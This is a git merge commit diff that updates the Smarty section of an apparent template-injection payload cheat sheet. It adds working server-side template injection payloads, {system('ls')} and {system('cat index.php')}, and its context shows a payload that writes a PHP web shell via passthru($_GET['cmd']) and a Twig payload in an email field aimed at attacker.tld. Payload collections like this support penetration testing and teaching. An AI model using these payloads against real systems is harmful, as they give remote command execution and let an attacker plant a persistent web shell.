Merge pull request #366 from mpgn/master

Update Smarty Template Injection
2024-04-27 16:55:08 +02:00 · 2021-05-20 18:08:20 +02:00 · 2021-05-20 18:08:20 +02:00 · e3e3ca6ba2
parent 28f68f47ae 367296c1f1
commit e3e3ca6ba2
1 changed files with 3 additions and 1 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@ -233,8 +233,10 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld

 ```python
 {$smarty.version}
-{php}echo `id`;{/php}
+{php}echo `id`;{/php} //deprecated in smarty v3
 {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
+{system('ls')} // compatible v3
+{system('cat index.php')} // compatible v3
 ```

 ## Freemarker